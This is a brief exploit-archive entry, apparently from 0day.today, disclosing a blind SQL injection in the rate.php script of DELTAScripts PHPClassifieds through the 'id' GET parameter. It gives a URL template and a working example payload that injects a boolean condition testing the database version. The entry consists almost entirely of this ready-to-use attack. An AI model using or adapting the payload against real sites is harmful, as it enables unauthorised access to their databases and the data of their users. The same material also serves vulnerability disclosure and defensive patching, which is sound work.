id: 10640
date: 01/08/2010
title: DELTAScripts PHPClassifieds (rate.php) Blind SQL Injection
author: n/a
cves: 

==========================================================
DELTAScripts PHPClassifieds (rate.php) Blind SQL Injection
==========================================================


/*
 
Name : DELTAScripts PHPClassifieds
Vuln : Blind SQL Injection

*/
 
Vulnerability is in the rate.php , $_GET['id']
 
[HOST]/[PATH]/rate.php?id=[true value]+[INJECTION]
 
exemples :
http://server/rate.php?id=405+and+%28select%20version%28%29%29=5--



#  0day.today [2023-03-26]  #